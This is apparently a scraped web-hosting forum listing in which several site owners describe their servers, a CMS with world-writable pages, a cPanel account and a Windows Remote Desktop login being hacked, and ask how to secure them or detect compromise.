# a995d2cc661fa72452472e9554b5520c
in it what does this code does.

View Replies! View Related

Cm Software Always Getting Hacked
We use the SnippetMaster content management software on a few of our sites to allow customers to make changes to their websites.

The software requires that the editable web pages be 777 - problem is, they're often getting hacked (usually just the index.html page being replaced with some rubbish about muslims and often involving '3sRaR')

I've not idea how he's doing it and it's happening on more than one server.

Can anyone recommend a way to stop this happening whilst being able to maintain the functionality of the cm software?

View Replies! View Related

Someone Hacked Cpanel
Last night i checked the bandwidth usage on one of my sites, only to find a different last IP in cPanel, the person who did this changed my index page to a page saying it had been hacked, and changed all my moderators/admins ranks to a guest, so that means he has accessed phpMyAdmin too,

Im wondering if anyone knows anything that will help avoid future hacks, and also where i go about getting his ISP to remove his internet connection for hacking, I have a confession from him in email about the hacking, i have banned his IP from cPanel but anyone could change their IP, and i cant exactly ban his entire country from the server

View Replies! View Related

My Server Has Been Hacked
I have Windows 2003, all security patches, I run Plesk 8.2 and nothing much else. I use MySQL as a database with port 3306 open so I can connect from the outside (password protected also). I do use strong passwords on my Plesk, administrator etc. I use standard microsoft FTP, Windows 2003 Firewall and connect through Plesk or remote connection.

Somebody has been able to penetrate to my Admin remote desktop :-( I found strange windows open when I connected and in the log there was an indication of the printer driver load. The printer name was one I don't have and my Remote connection has Printers off. The attacker although smart did connect with his printer and that was visable in log. When he terminated the session I found his IP.

I have since changed my administrator password but it doesn't help, he was in again today. He didn't do any harm up to now I think, I checked for viruses and Spyware.

I don't know what to do any more. He can do whatever he wants and if I don't know how he is getting access to my admin account I can not stop him. I blocked today with IPSec the whole IP range of his provider, but as he is smart he can hack another computer and connect to me from him (maybe he has already done that and the IP was from a hacked server). This is no solution. I need to patch the hole.

I use ASP scripts but I don't think one can gain access to the whole admin by them, maybe only get access to my database (if I would make a mistake and wouldn't protect for the injections or some other things).

I am desperate. Plese, if anybody has some ideas what can I do, how do I "catch" him, I mean patch the hole, please let me know.

I had an idea to block all IP's to port 3389 (Remote desktop) except my IP. But I am a little scared to do that not to lock myself out. And even in that case, if he knows admin password he can get in some other way than using remote desktop,

View Replies! View Related

CentOS - My System Is Hacked

I'm running CentOS 4.4 and I want to know what utilities and procedures I need to follow to find out if my system is compromised (hacked). I dont see any symptoms right now but I want to be fully aware in case something happens.

I'm running CentOS 4.4 and I want to know what utilities and procedures I need to follow to find out if my system is compromised (hacked).

I dont see any symptoms right now but I want to be fully aware in case something happens.